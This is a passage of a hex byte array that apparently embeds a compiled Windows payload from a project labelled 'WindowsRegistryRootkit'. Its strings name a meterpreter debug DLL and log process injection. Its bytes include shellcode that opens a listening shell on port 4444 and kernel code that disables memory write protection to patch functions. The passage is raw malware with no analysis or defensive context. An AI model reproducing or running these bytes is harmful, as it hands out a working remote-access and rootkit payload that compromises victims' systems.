4,0x65,0x20,0x72,0x75,0x6c,\r\n0x65,0x20,0x6e,0x61,0x6d,0x65,0x3d,0x53,0x79,0x73,0x74,0x65,0x6d,0x00,0x00,0x00,\r\n0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,0x3a,0x20,0x44,0x6f,\r\n0x6e,0x65,0x20,0x28,0x65,0x78,0x69,0x74,0x20,0x63,0x6f,0x64,0x65,0x3a,0x20,0x25,\r\n0x64,0x29,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x4d,0x61,0x69,0x6e,0x54,0x68,0x72,0x65,0x61,0x64,0x28,0x29,\r\n0x3a,0x20,0x45,0x58,0x49,0x54,0x0a,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x44,0x6c,0x6c,0x4d,0x61,0x69,0x6e,0x28,\r\n0x29,0x3a,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x65,0x64,0x20,0x69,0x6e,0x74,0x6f,\r\n0x20,0x70,0x72,0x6f,0x63,0x65,0x73,0x73,0x20,0x22,0x25,0x73,0x22,0x20,0x28,0x50,\r\n0x49,0x44,0x3d,0x25,0x64,0x29,0x2c,0x20,0x55,0x73,0x65,0x72,0x20,0x3d,0x20,0x22,\r\n0x25,0x73,0x22,0x0a,0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,\r\n0x6e,0x2e,0x63,0x70,0x70,0x00,0x00,0x00,0x43,0x72,0x65,0x61,0x74,0x65,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x28,0x29,0x20,0x45,0x52,0x52,0x4f,0x52,0x20,0x25,0x64,0x0a,\r\n0x00,0x00,0x00,0x00,0x2e,0x5c,0x64,0x6c,0x6c,0x6d,0x61,0x69,0x6e,0x2e,0x63,0x70,\r\n0x70,0x00,0x00,0x00,0x44,0x75,0x6d,0x6d,0x79,0x28,0x29,0x00,0x3c,0x4f,0x4b,0x3e,\r\n0x20,0x74,0x6f,0x20,0x65,0x78,0x69,0x74,0x2e,0x2e,0x2e,0x00,0x73,0x70,0x72,0x69,\r\n0x6e,0x74,0x66,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x76,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x00,0x00,0x00,0x00,0x6d,0x73,0x76,0x63,\r\n0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5f,0x76,0x73,0x63,0x70,0x72,0x69,0x6e,\r\n0x74,0x66,0x00,0x00,0x6d,0x73,0x76,0x63,0x72,0x74,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x5b,0x25,0x2e,0x35,0x64,0x5d,0x20,0x2e,0x5c,0x25,0x73,0x28,0x25,0x64,0x29,0x20,\r\n0x3a,0x20,0x25,0x73,0x00,0x00,0x00,0x00,0x30,0x24,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x02,0x26,0x00,0x00,0x08,0x20,0x00,0x00,0x8c,0x24,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x
00,0x2a,0x26,0x00,0x00,0x64,0x20,0x00,0x00,\r\n0x28,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x26,0x00,0x00,\r\n0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x36,0x26,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xb4,0x24,0x00,0x00,0xc4,0x24,0x00,0x00,0xd2,0x24,0x00,0x00,0xe8,0x24,0x00,0x00,\r\n0xf8,0x24,0x00,0x00,0x08,0x25,0x00,0x00,0x12,0x25,0x00,0x00,0x28,0x25,0x00,0x00,\r\n0x3e,0x25,0x00,0x00,0x50,0x25,0x00,0x00,0xa6,0x24,0x00,0x00,0x7a,0x25,0x00,0x00,\r\n0x88,0x25,0x00,0x00,0x94,0x25,0x00,0x00,0xa0,0x25,0x00,0x00,0xb0,0x25,0x00,0x00,\r\n0xc6,0x25,0x00,0x00,0xd2,0x25,0x00,0x00,0xe0,0x25,0x00,0x00,0xf2,0x25,0x00,0x00,\r\n0x66,0x25,0x00,0x00,0x98,0x24,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x26,0x00,0x00,\r\n0x1c,0x26,0x00,0x00,0x00,0x00,0x00,0x00,0x05,0x01,0x45,0x78,0x69,0x74,0x54,0x68,\r\n0x72,0x65,0x61,0x64,0x00,0x00,0x57,0x04,0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x46,\r\n0x72,0x65,0x65,0x00,0xe6,0x01,0x47,0x65,0x74,0x4c,0x61,0x73,0x74,0x45,0x72,0x72,\r\n0x6f,0x72,0x00,0x00,0x43,0x00,0x43,0x6c,0x6f,0x73,0x65,0x48,0x61,0x6e,0x64,0x6c,\r\n0x65,0x00,0x64,0x04,0x57,0x61,0x69,0x74,0x46,0x6f,0x72,0x53,0x69,0x6e,0x67,0x6c,\r\n0x65,0x4f,0x62,0x6a,0x65,0x63,0x74,0x00,0xa3,0x00,0x43,0x72,0x65,0x61,0x74,0x65,\r\n0x54,0x68,0x72,0x65,0x61,0x64,0x00,0x00,0x54,0x04,0x56,0x69,0x72,0x74,0x75,0x61,\r\n0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,0x7b,0x04,0x57,0x69,0x6e,0x45,0x78,0x65,\r\n0x63,0x00,0xaa,0x01,0x47,0x65,0x74,0x43,0x75,0x72,0x72,0x65,0x6e,0x74,0x50,0x72,\r\n0x6f,0x63,0x65,0x73,0x73,0x49,0x64,0x00,0xad,0x01,0x47,0x65,0x74,0x43,0x75,0x72,\r\n0x72,0x65,0x6e,0x74,0x54,0x68,0x72,0x65,0x61,0x64,0x49,0x64,0x00,0x00,0x5a,0x04,\r\n0x56,0x69,0x72,0x74,0x75,0x61,0x6c,0x50,0x72,0x6f,0x74,0x65,0x63,0x74,0x00,0x00,\r\n0xf4,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x46,0x69,0x6c,0x65,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0xf6,0x01,0x47,0x65,0x74,0x4d,0x6f,0x64,0x75,0x6c,\r\n0x65,0x48,0x61,0x6e,0
x64,0x6c,0x65,0x41,0x00,0x00,0x04,0x01,0x45,0x78,0x69,0x74,\r\n0x50,0x72,0x6f,0x63,0x65,0x73,0x73,0x00,0xb5,0x04,0x6c,0x73,0x74,0x72,0x6c,0x65,\r\n0x6e,0x41,0x00,0x00,0x8d,0x04,0x57,0x72,0x69,0x74,0x65,0x46,0x69,0x6c,0x65,0x00,\r\n0x3b,0x02,0x47,0x65,0x74,0x53,0x74,0x64,0x48,0x61,0x6e,0x64,0x6c,0x65,0x00,0x00,\r\n0x3a,0x03,0x4f,0x75,0x74,0x70,0x75,0x74,0x44,0x65,0x62,0x75,0x67,0x53,0x74,0x72,\r\n0x69,0x6e,0x67,0x41,0x00,0x00,0xfd,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x46,0x72,0x65,\r\n0x65,0x00,0xf9,0x02,0x4c,0x6f,0x63,0x61,0x6c,0x41,0x6c,0x6c,0x6f,0x63,0x00,0x00,\r\n0x20,0x02,0x47,0x65,0x74,0x50,0x72,0x6f,0x63,0x41,0x64,0x64,0x72,0x65,0x73,0x73,\r\n0x00,0x00,0xf1,0x02,0x4c,0x6f,0x61,0x64,0x4c,0x69,0x62,0x72,0x61,0x72,0x79,0x41,\r\n0x00,0x00,0x4b,0x45,0x52,0x4e,0x45,0x4c,0x33,0x32,0x2e,0x64,0x6c,0x6c,0x00,0x00,\r\n0x07,0x03,0x77,0x73,0x70,0x72,0x69,0x6e,0x74,0x66,0x41,0x00,0xf8,0x01,0x4d,0x65,\r\n0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x41,0x00,0x55,0x53,0x45,0x52,0x33,0x32,\r\n0x2e,0x64,0x6c,0x6c,0x00,0x00,0x5e,0x01,0x47,0x65,0x74,0x55,0x73,0x65,0x72,0x4e,\r\n0x61,0x6d,0x65,0x41,0x00,0x00,0x41,0x44,0x56,0x41,0x50,0x49,0x33,0x32,0x2e,0x64,\r\n0x6c,0x6c,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x80,0x01,0xe4,0x50,0x00,0x00,0x00,0x00,0x92,0x26,0x00,0x00,\r\n0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x88,0x26,0x00,0x00,\r\n0x8c,0x26,0x00,0x00,0x90,0x26,0x00,0x00,0x60,0x13,0x00,0x00,0xa8,0x26,0x00,0x00,\r\n0x00,0x00,0x6d,0x65,0x74,0x65,0x72,0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,\r\n0x62,0x75,0x67,0x2e,0x64,0x6c,0x6c,0x00,0x44,0x75,0x6d,0x6d,0x79,0x00,0x00,0x00,\r\n0x52,0x53,0x44,0x53,0x82,0x5a,0x19,0x91,0x44,0xdc,0xaa,0x48,0x8a,0xc8,0x7d,0xac,\r\n0xf1,0xd6,0xba,0x09,0x01,0x00,0x00,0x00,0x58,0x3a,0x5c,0x64,0x65,0x76,0x5c,0x5f,\r\n0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x73,0x5c,0x5f,0x4c,0x6f,0x63,0x61,0x6c,0x5c,\r\n0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x52,0x65,0x67,0x69,0x73,0x74,0x72,0x79,0x52,\r\n0x6f,
0x6f,0x74,0x6b,0x69,0x74,0x5c,0x73,0x72,0x63,0x5c,0x6d,0x65,0x74,0x65,0x72,\r\n0x70,0x72,0x65,0x74,0x65,0x72,0x5f,0x64,0x65,0x62,0x75,0x67,0x2e,0x70,0x64,0x62,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,\r\n0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,\r\n0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,\r\n0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,\r\n0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,\r\n0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,\r\n0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x6
6,0x8b,\r\n0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,\r\n0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,\r\n0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,\r\n0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,\r\n0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,\r\n0xd5,0x97,0x31,0xdb,0x53,0x68,0x02,0x00,0x11,0x5c,0x89,0xe6,0x6a,0x10,0x56,0x57,\r\n0x68,0xc2,0xdb,0x37,0x67,0xff,0xd5,0x53,0x57,0x68,0xb7,0xe9,0x38,0xff,0xff,0xd5,\r\n0x53,0x53,0x57,0x68,0x74,0xec,0x3b,0xe1,0xff,0xd5,0x57,0x97,0x68,0x75,0x6e,0x4d,\r\n0x61,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,\r\n0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,\r\n0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,\r\n0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x
00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x10,0x00,0x00,0xc8,0x00,0x00,0x00,0x27,0x30,0x2e,0x30,0x34,0x30,0x3b,0x30,\r\n0x4d,0x30,0x54,0x30,0x66,0x30,0x73,0x30,0x85,0x30,0x97,0x30,0x9e,0x30,0xba,0x30,\r\n0xd5,0x30,0xdc,0x30,0xee,0x30,0x03,0x31,0x0d,0x31,0x2b,0x31,0x38,0x31,0x40,0x31,\r\n0x46,0x31,0x4d,0x31,0x66,0x31,0x6e,0x31,0x74,0x31,0x7b,0x31,0x88,0x31,0x8f,0x31,\r\n0x9e,0x31,0xa4,0x31,0xb6,0x31,0xbd,0x31,0xca,0x31,0xd1,0x31,0xef,0x31,0xf4,0x31,\r\n0x7e,0x32,0x85,0x32,0x95,0x32,0xa0,0x32,0xae,0x32,0xb5,0x32,0xe3,0x32,0x00,0x33,\r\n0x0a,0x33,0x17,0x33,0x2b,0x33,0x31,0x33,0x3b,0x33,0x63,0x33,0x68,0x33,0x70,0x33,\r\n0x78,0x33,0x83,0x33,0xc4,0x33,0xca,0x33,0xcf,0x33,0xd7,0x33,0xec,0x33,0xf1,0x33,\r\n0x05,0x34,0x0a,0x34,0x2a,0x34,0x56,0x34,0x86,0x34,0x8c,0x34,0x9b,0x34,0xa3,0x34,\r\n0xc0,0x34,0xc9,0x34,0xd0,0x34,0xe2,0x34,0xe8,0x34,0xee,0x34,0xf4,0x34,0xfa,0x34,\r\n0x00,0x35,0x06,0x35,0x0c,0x35,0x12,0x35,0x18,0x35,0x1e,0x35,0x24,0x35,0x2a,0x35,\r\n0x30,0x35,0x36,0x35,0x3c,0x35,0x42,0x35,0x48,0x35,0x4e,0x35,0x54,0x35,0x5a,0x35,\r\n0x60,0x35,0x66,0x35,0x6c,0x35,0x72,0x35,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0
x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,\r\n0x55,0x8b,0xec,0x83,0xec,0x10,0x8b,0x45,0x08,0x50,0xe8,0xd1,0xe1,0xff,0xff,0xc7,\r\n0x45,0xf8,0x00,0x16,0x00,0x00,0x8b,0x4d,0xf8,0x51,0x6a,0x00,0xff,0x15,0xe0,0x02,\r\n0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x74,0x4a,0x68,0x00,0x16,0x00,0x00,\r\n0x68,0x60,0x39,0x00,0x10,0x8b,0x55,0xfc,0x52,0xe8,0x80,0xdc,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0x45,0x08,0x50,0x68,0x14,0x2e,0x00,0x10,0xe8,0x51,0xd6,0xff,0xff,0x89,\r\n0x45,0xf0,0x8b,0x4d,0x08,0x51,0x68,0x10,0x2e,0x00,0x10,0xe8,0x40,0xd6,0xff,0xff,\r\n0x89,0x45,0xf4,0x8b,0x55,0xf0,0x8b,0x45,0xf8,0x89,0x02,0x8b,0x4d,0xf4,0x8b,0x55,\r\n0xfc,0x89,0x11,0xeb,0x0d,0x68,0xec,0x09,0x00,0x10,0xe8,0x03,0xdc,0xff,0xff,0x83,\r\n0xc4,0x04,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x6a,0x01,0xff,0x15,0x00,0x03,0x00,0x10,0x0f,0x20,0xc0,0x25,0xff,\r\n0xff,0xfe,0xff,0x0f,0x22,0xc0,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x0f,0x20,0xc0,0x0d,0x00,0x00,0x01,0x00,0x0f,0x22,0xc0,0x5d,0xc3,\r\n0x55,0x8b,0xec,0x83,0xec,0x14,0xe8,0xc5,0xff,0xff,0xff,0x6a,0x06,0x68,0xf4,0x2d,\r\n0x00,0x10,0xa1,0x0c,0x2e,0x00,0x10,0x50,0xe8,0xe1,0xdb,0xff,0xff,0x83,0xc4,0x0c,\r\n0xe8,0xcb,0xff,0xff,0xff,
0x8b,0x4d,0x0c,0x51,0x8b,0x55,0x08,0x52,0xff,0x15,0x0c,\r\n0x2e,0x00,0x10,0x89,0x45,0xfc,0x8b,0x45,0xfc,0x50,0x68,0x04,0x0a,0x00,0x10,0xe8,\r\n0x7e,0xdb,0xff,0xff,0x83,0xc4,0x08,0x68,0x00,0x54,0x00,0x10,0xff,0x15,0x04,0x03,\r\n0x00,0x10,0x85,0xc0,0x75,0x07,0xc6,0x05,0xfa,0x2d,0x00,0x10,0x01,0x83,0x7d,0xfc,\r\n0x00,0x0f,0x8c,0x1c,0x01,0x00,0x00,0x8b,0x0d,0xfc,0x2d,0x00,0x10,0x51,0x6a,0x00,\r\n0xff,0x15,0xe0,0x02,0x00,0x10,0x89,0x45,0xf8,0x83,0x7d,0xf8,0x00,0x0f,0x84,0xf6,\r\n0x00,0x00,0x00,0x8b,0x15,0xfc,0x2d,0x00,0x10,0x52,0xa1,0x1c,0x2e,0x00,0x10,0x50,\r\n0x8b,0x4d,0xf8,0x51,0xe8,0x65,0xdb,0xff,0xff,0x83,0xc4,0x0c,0x8b,0x15,0x08,0x2e,\r\n0x00,0x10,0x2b,0x15,0x00,0x2e,0x00,0x10,0x52,0x8b,0x45,0xf8,0x50,0xe8,0x4e,0xd8,\r\n0xff,0xff,0xe8,0x19,0xff,0xff,0xff,0x8b,0x0d,0x04,0x2e,0x00,0x10,0x51,0x8b,0x55,\r\n0xf8,0x03,0x15,0x00,0x2e,0x00,0x10,0x52,0xa1,0x08,0x2e,0x00,0x10,0x50,0xe8,0x2b,\r\n0xdb,0xff,0xff,0x83,0xc4,0x0c,0xe8,0x15,0xff,0xff,0xff,0x8b,0x0d,0x08,0x2e,0x00,\r\n0x10,0x2b,0x0d,0x00,0x2e,0x00,0x10,0x89,0x4d,0xf0,0x8b,0x55,0xf0,0x52,0xe8,0x4d,\r\n0xfe,0xff,0xff,0x8b,0x45,0xf0,0x50,0x68,0x90,0x25,0x00,0x10,0xe8,0xdf,0xd4,0xff,\r\n0xff,0x89,0x45,0xf4,0x8b,0x4d,0xf4,0x51,0x68,0x34,0x0a,0x00,0x10,0xe8,0xb0,0xda,\r\n0xff,0xff,0x83,0xc4,0x08,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0x0f,0xb6,0x15,0xfa,\r\n0x2d,0x00,0x10,0xf7,0xda,0x1b,0xd2,0x23,0x15,0x1c,0x2e,0x00,0x10,0x52,0x8b,0x45,\r\n0xf4,0x50,0x6a,0x00,0x6a,0x00,0x6a,0x00,0x68,0xff,0xff,0x1f,0x00,0x8d,0x4d,0xec,\r\n0x51,0xff,0x15,0xf4,0x02,0x00,0x10,0x89,0x45,0xfc,0x83,0x7d,0xfc,0x00,0x7c,0x0c,\r\n0x8b,0x55,0xec,0x52,0xff,0x15,0xb4,0x02,0x00,0x10,0xeb,0x11,0x8b,0x45,0xfc,0x50,\r\n0x68,0x60,0x0a,0x00,0x10,0xe8,0x58,0xda,0xff,0xff,0x83,0xc4,0x08,0x6a,0x00,0x8b,\r\n0x4d,0xf8,0x51,0xff,0x15,0x90,0x02,0x00,0x10,0x8b,0x55,0x08,0xc7,0x42,0x34,0x00,\r\n0x00,0x00,0x00,0x8b,0x45,0xfc,0x8b,0xe5,0x5d,0xc2,0x08,0x00,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x08,0x8b,0x45,0x08,0x8b,0x4d,0x08,0x03,0x48,0x3c,0x89,\r\n0x4d,0xfc
,0x8b,0x55,0xfc,0x8b,0x45,0x08,0x03,0x42,0x28,0x89,0x45,0xf8,0x6a,0x06,\r\n0x8b,0x4d,0xf8,0x51,0x68,0xf4,0x2d,0x00,0x10,0xe8,0x40,0xda,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0x55,0xf8,0x89,0x15,0x0c,0x2e,0x00,0x10,0xe8,0x01,0xfe,0xff,0xff,0x8b,\r\n0x45,0xf8,0xc6,0x00,0x68,0x8b,0x4d,0xf8,0xc7,0x41,0x01,0x20,0x50,0x00,0x10,0x8b,\r\n0x55,0xf8,0xc6,0x42,0x05,0xc3,0xe8,0x05,0xfe,0xff,0xff,0x68,0x20,0x50,0x00,0x10,\r\n0x8b,0x45,0xf8,0x50,0x68,0x88,0x0a,0x00,0x10,0xe8,0xc4,0xd9,0xff,0xff,0x83,0xc4,\r\n0x0c,0x8b,0xe5,0x5d,0xc2,0x04,0x00,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,\r\n0x55,0x8b,0xec,0x83,0xec,0x30,0x8b,0x45,0x0c,0xc7,0x00,0x00,0x00,0x00,0x00,0x8b,\r\n0x4d,0x10,0xc7,0x01,0x00,0x00,0x00,0x00,0x8b,0x55,0x08,0x8b,0x45,0x08,0x03,0x42,\r\n0x3c,0x89,0x45,0xf8,0x8b,0x4d,0xf8,0x0f,0xb7,0x51,0x14,0x8b,0x45,0xf8,0x8d,0x4c,\r\n0x10,0x18,0x89,0x4d,0xf0,0xc7,0x45,0xfc,0x00,0x00,0x00,0x00,0xc7,0x45,0xf4,0x00,\r\n0x00,0x00,0x00,0xc7,0x45,0xec,0x00,0x00,0x00,0x00,0xeb,0x09,0x8b,0x55,0xec,0x83,\r\n0xc2,0x01,0x89,0x55,0xec,0x8b,0x45,0xf8,0x0f,0xb7,0x48,0x06,0x39,0x4d,0xec,0x0f,\r\n0x83,0xdc,0x00,0x00,0x00,0x8b,0x55,0xf0,0x8b,0x45,0x08,0x03,0x42,0x0c,0x89,0x45,\r\n0xdc,0x8b,0x4d,0xf0,0x8b,0x51,0x24,0x81,0xe2,0x00,0x00,0x00,0x02,0x0f,0x84,0xb0,\r\n0x00,0x00,0x00,0x68,0xc8,0x0a,0x00,0x10,0x8d,0x45,0xe0,0x50,0xe8,0x0f,0xe0,0xff,\r\n0xff,0x85,0xc0,0x0f,0x84,0x9a,0x00,0x00,0x00,0x83,0x7d,0xfc,0x00,0x74,0x4f,0x8b,\r\n0x4d,0xfc,0x03,0x4d,0xf4,0x8b,0x55,0xf0,0x39,0x4a,0x0c,0x75,0x41,0x8b,0x45,0xf8,\r\n0x8b,0x48,0x38,0x83,0xe9,0x01,0x8b,0x55,0xf